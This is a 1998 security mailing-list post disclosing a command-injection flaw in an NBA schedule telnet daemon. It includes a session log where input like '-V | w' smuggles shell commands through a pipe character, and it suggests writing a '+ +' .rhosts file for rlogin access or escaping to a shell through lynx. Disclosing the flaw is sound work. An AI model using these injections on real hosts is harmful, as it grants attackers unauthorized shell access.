NBA 4.9 Allows Shell Access

From: HD Moore (hdmooreat_private)
Date: Sun Sep 20 1998 - 17:23:06 PDT

  • Next message: James McParlane: "Re: FreeBSD VM gremlin"

    Recently browsing the internet I came upon a link to telnet to a host on
    port 859, apparently a NBA (National Basketball Association) telnet
    daemon for showing game schedules, while I am not sure who wrote it, or
    who uses it, it does create a major secuity hole on the machine it is
    running.  At login, you recieve a prompt that looks like <nba>, if you
    type anything then the 'pipe' character "|" followed by a shell comand,
    that command is executed.  Doing this you could create a .rhosts file
    containing the classic "+ +", then giving shell access through rlogin.
    It is also possible to start lynx ( or some other program), then break
    out into a shell from that program. If anyone knows the origin of this
    program, or someone who uses it, please alert them to this fact.  Please
    no flames concerning how stupid of a bug this is, it is still a bug =)
    Below is a cut from a session log:
    usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
     [TEAM|DIV]] [mm/dd...]
     With -v, print version information and exit.
       This is version 4.9 for NBA 95-96.
     With -h, print this help message and exit.
     With no teams or divisions specified, print next NUM days (default=1)
       of league schedule from given date(s) (default is today if none
     With one team or division, print next NUM games (default=3) for that
       or teams in that division.
     With two teams or divisions, print games where first team (or team
       in first division) plays second team (or team in second division).
     -H or -A: Print only home or away games, for first team or division.
     -C: Print monthly calendar format (specify month or default is
     -E: Use European dates (dd/mm) and weeks (starting on Monday).
     -U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
     Teams can specified with or without leading -t, from the following
       atl - Atlanta            bos - Boston             cha - Charlotte
       chi - Chicago            cle - Cleveland          dal - Dallas
       den - Denver             det - Detroit            gol - Golden State
       hou - Houston            ind - Indiana            lac - LA Clippers
       lal - LA Lakers          mia - Miami              mil - Milwaukee
       min - Minnesota           nj - New Jersey          ny - New York
       orl - Orlando            phi - Philadelphia       pho - Phoenix
       por - Portland           sac - Sacramento         san - San Antonio
       sea - Seattle            tor - Toronto            uta - Utah
       van - Vancouver          was - Washington
     Divisions can specified with or without a leading -d, from the
    following list:
       pac - Pacific            mid - Midwest            ctl - Central
       atc - Atlantic
     The season runs from 11/3 to 4/21.
    <nba> -V | w
    /usr/local/bin/nba: unknown team or division code: -V
    18:00  up 18 days, 14:14,  3 users,  load average: 0.29, 0.96, 0.94
    User     tty        from             login@    idle   JCPU   PCPU what
    xxxxxx p6         lichen           13:17    3days               -ksh
    xxxxxx   p0         zlin             14:25    5days               -tcsh
    xxxxxx  p7         petrie           15:13    2days  24:46     14 -csh
    <nba> blah | lynx

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